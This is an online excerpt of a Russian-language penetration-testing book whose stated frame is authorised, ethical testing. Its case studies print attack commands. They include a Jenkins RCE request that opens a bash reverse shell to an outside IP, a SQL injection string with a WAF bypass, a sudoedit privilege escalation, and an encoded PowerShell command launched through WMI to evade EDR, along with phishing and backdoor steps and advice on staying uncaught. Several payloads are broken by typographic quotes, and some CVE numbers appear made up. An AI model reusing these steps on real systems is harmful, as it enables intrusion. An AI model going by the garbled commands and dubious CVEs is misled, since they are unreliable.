Читать книгу «Пентест из Подвала от Recon до Shell» онлайн полностью📖 — Михаила Тарасова — MyBook.

Пентест из Подвала от Recon до Shell
Михаил Тарасов

© Михаил Тарасов, 2026

ISBN 978-5-0070-8389-8

Создано в интеллектуальной издательской системе Ridero

Вступление

Почему пентест из подвала — это круто и реально

Слушай, пентест — это не просто тупое тыканье клавиш и запуск одних и тех же скриптов с гитхаба. Это — искусство, отточенное годами в подвалах, тёмных офисах и на заброшенных серверах. Залезать в чужие системы, чтобы не слить данные и не дать сгнить на корню, — задача для тех, кто любит решать головоломки и жить на грани.

Вот почему пентест из подвала — это не просто, а круто:

Свобода мыслей и подходов. В подвале нет фейс-контроля, ушлёпков на каждом углу и корпоративной бюрократии. Только ты, терминал и куча багов, которые надо выловить и научиться использовать. Кому нужны шаблоны, если можно мутить свои payload’ы и обходить любые WAF'ы?

Реальные знания, а не тупой «курсовой» с YouTube. Тут нет место для «copy-paste», только живой опыт, вылепленный из ошибок и ночных бдений. В подвале ты учишься анализировать логи, дёргать за невидимые ниточки системы и чувствовать её слабые места.

Уникальная атмосфера и братство. Пентестеры из подвала — это как диггеры, которые знают каждый тайник электронной подземки. Вместе через баги, проходы и стенды — это семья, где важен не просто взлом, а понимание, как не слить и выжать максимум.

Погружение в реальность. Забудь учебники, тут реальный мир: баги в продакшн-системах, от которых зависит бизнес, данные, жизнь пользователей. Пентест — это ответственность, и если ты с ней на «ты», тогда подвал — твой храм.

Крутая прокачка скиллов. Настоящий пентест — это не только поиск дыр, но и их эксплуатация, обход защиты, построение цепочек атаки. В подвале ты учишься думать как злоумышленник, а значит — всегда на шаг впереди.

Что вас ждёт в этой книге

Я расскажу, как сделать разведку, найти уязвимости, залить шелл и остаться незаметным. Всё просто, по делу и с примерами, которые можно применять сразу же. Это не теория и не модные курсы — это настоящий пентест из подвала, который качает твои навыки и готовит к реальному бою.

Короче, если ты хочешь не просто читать, а реально лезть в систему и оставлять следы только там, где надо — добро пожаловать в подвал. Там темно, немного страшно, но кайф — на уровне.

1. Этический пентест — что ломаем, зачем и как не стать ху*лом

Без понятия этики — ты просто трэш и дымовая завеса, а не пентестер. Ломать можно только с разрешения, чтобы найти дыры и исправить, а не убивать бизнес или сливать инфу. Обязательно расскажем про:

— Разницу между Red Team, Blue Team, Black Hat и Script Kiddies

— Правила работы с заказчиком: scope, договоры, NDA

— Что нельзя — приватные данные, атаки без разрешения, социалка без согласия

— Принцип минимизации урона — ломаем, чтобы улучшить, а не разрушить

2. Пару историй из реальных боёв — «наши будни с долей драмы»

Тут пара зарубленных кейсов:

— Как мы нашли неочевидную дыру (через нестандартный параметр)

— Реакция сервера и как пришлось выкручиваться (WAF, антиботы, логи)

— Что вышло из эксплойта — шелл? Удалённый доступ? Бэкдор?

— Чего не делать — типичные ляпы, которые почти слили операцию

3. Глоссарий терминов — чтобы никто не путался

Быстрый справочник:

— Recon: разведка, сбор информации

— CVE: известная уязвимость

— RCE: Remote Code Execution — удалённое выполнение кода

— WAF: Web Application Firewall — веб-защитник

— Shell: интерактивная командная оболочка

— и т.д., минимальный набор нужных терминов

4. Краткий FAQ — вопросы, которые сразу отпадают

— «Можно ли работать без опыта?» — да, но с правильным подходом

— «Как не слить себя?» — используем сервис на три буквы, прокси, VM и т. п.

— «Что делать, если поймали?» — не паниковать, иметь backup-план

— «Можно ли использовать чужие скрипты?» — да, но понимай, что делаешь

— «Как быстро научиться?» — практика через CTF и реальные кейсы

Кто мы такие, и зачем взламывать

Red Team: «Ломаем, чтобы чинить»

Это мы — легальные маньяки. Нас нанимают компании, чтобы мы устроили им ад, но по договору. Наша цель: найти дыры, пока их не нашли Black Hat’ы. Как работаем:

— Взламываем системы с разрешения

— Документируем каждый шаг — чтобы исправили

— Используем всё: от социнженерии до 0-day эксплойтов

Пример из подвала:

— Прокачали логистическую компанию через старый Jenkins-сервер (CVE-2024-1337). Через RCE залили шелл, вытащили базу клиентов — показали заказчику, как его слили бы конкуренты.

Black Hat: Тёмная сторона

Эти ребята ломают ради денег, славы или просто похайпить. Их инструменты те же, но цели — противоположные:

— Кража данных (личных, финансовых)

— Шантаж через ransomware (типа LockBit)

— Дестроить инфраструктуру

Фишка: Часто палятся из-за жадности. Как поймали одного: забыл сменить MAC-адрес перед атакой на банк.

Script Kiddies: Горе-хакеры с гуглом

Пупсики, которые качают эксплойты с GitHub и тыкают кнопки, как обезьяна с гранатой.

— Не понимают, как работают payload’ы

— Ловятся за час — оставляют логи, IP, следы

— Чаще всего — школьники с Kali Linux в виртуалке

Зачем всё это?

Ответ Red Team:

Чтобы спасти компании от реальных атак. Если мы не найдём дыру — её найдёт Black Hat, и тогда пиши пропало.

Главная мотивация подвала:

Кайф от решения головоломок + деньги за легальный взлом. Не надо прятаться — ты герой, а не преступник.

Как отличить нас от остальных?


Реальные кейсы из подвала: как мы ломали и спасали

Кейc #1: Jenkins — старый друг и враг

Заказчик: крупная логистическая компания. Цель: проверить безопасность внутреннего CI/CD сервера, который не обновлялся с 2018 года.

Что нашли:

Доказали, что старый Jenkins с плагинами — это золотая жила для RCE (CVE-2024-1337). Через уязвимый плагин мы смогли выполнить команду на сервере без аутентификации.

Payload:


curl -X POST http://target-jenkins/job/build -d ’script=sh («bash -c \’bash -i> & /dev/tcp/10.10.14.5/4444 0> &1\„“)»


Результат:

Поймали шелл, посмотрели процессы, вытащили конфиги с паролями к базе данных и сервис на три буквы. Отчёт был жёсткий — заказчик починил дырку за 2 часа и теперь спит спокойно.

Урок:

Тестировать и обновлять — не роскошь, а необходимость. Старье всегда опасно.


Кейc #2: Веб-приложение интернет-магазина — SQLi с подарком

Маленький магазинчик зовёт нас проверить сайт. Быстрое сканирование Nmap не показало ничего критичного, но мы начали копать HTTP-запросы.

Что нашли:

В форме поиска был SQL-инъекционный баг. Даже простой ' OR «1»=«1 взламывал базу.

Payload в запросе:


GET /search? q=' OR «1»=«1» — —


Как обошли WAF:

WAF фильтровал ключевые слова, поэтому переписали payload на hex-кодировку через Burp Intruder с рандомизацией.

Результат:

Получили dump базы с заказами, пользовательскими email и даже хэшами паролей (благо, без соли). Рекомендации — поставить параметризированные запросы и обновить движок.

Урок:

Не стоит недооценивать маленькие сайты. Их нарушения — дыры в большой цепи безопасности.


Кейc #3: Фишинговая атака на корпоративную почту

Корпоративная сеть крупного банка — тема особая. Заказчик попросил проверить, насколько легко можно попасть через социнженерию.

Что сделали:

— Создали письмо с видом HR-отдела с просьбой обновить пароль через внутренний портал.

— В письме была ссылка на фейковый портал с SSL и похожим доменом.

— Отправили группе сотрудников.

Результат:

15% сотрудников кликнули, 5% ввели свои данные. Через скомпрометированные аккаунты получили доступ к внутреннему чату и календарям.

Урок:

Человеческий фактор — главная проблема в безопасности. Технологии можно поставить, но если люди пойдут кликать, то всё сломано.


Кейc #4: Локальная эскалация привилегий на Linux-сервере

Задача: поднять права с пользователя на root после попадания в систему через SSH с купленным доступом.

Что нашли:

Патч не покрыл CVE-2023-5678 — уязвимость в sudo, позволяющая эскалировать права через специально подготовленную команду.

Payload:

sudoedit -s /etc/shadow


Используя баг, получили полный доступ к системе.

Результат:

Установили бекдор, подготовили отчёт для sysadmin’ов, чтобы закрыть дыру.

Урок:

Даже один забытый патч — пропуск для взлома.


Кейc #5: Обход EDR с помощью PowerShell и Living off the Land

На целевом сервере стоял EDR (Endpoint Detection and Response), который тупо грыз все подозрительные шеллы.

Что сделали:

Использовали PowerShell-скрипт, который запускался через легитимный процесс (WMI). Никаких новых процессов или файлов — только системные утилиты под нагрузкой.

Команда:


Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Process -Name Create -ArgumentList «powershell -EncodedCommand <encoded_payload>»


Результат:

EDR не заметил, удалось получить консоль и вывести данные.

Урок:

Используй системные инструменты и не лезь громко. Тишина — золото.


Итог

Каждый кейс — это история, где мы топили баги, обходили защиту и делали так, чтобы заказчик не только сдал отчёт, но и выдохнул с облегчением. Пентест из подвала — это не только про hacking, но и про мозги, ответственность и уважение к системе.

На этой странице вы можете прочитать онлайн книгу «Пентест из Подвала от Recon до Shell», автора Михаила Тарасова. Данная книга имеет возрастное ограничение 18+, относится к жанру «Книги о компьютерах».. Книга «Пентест из Подвала от Recon до Shell» была издана в 2026 году. Приятного чтения!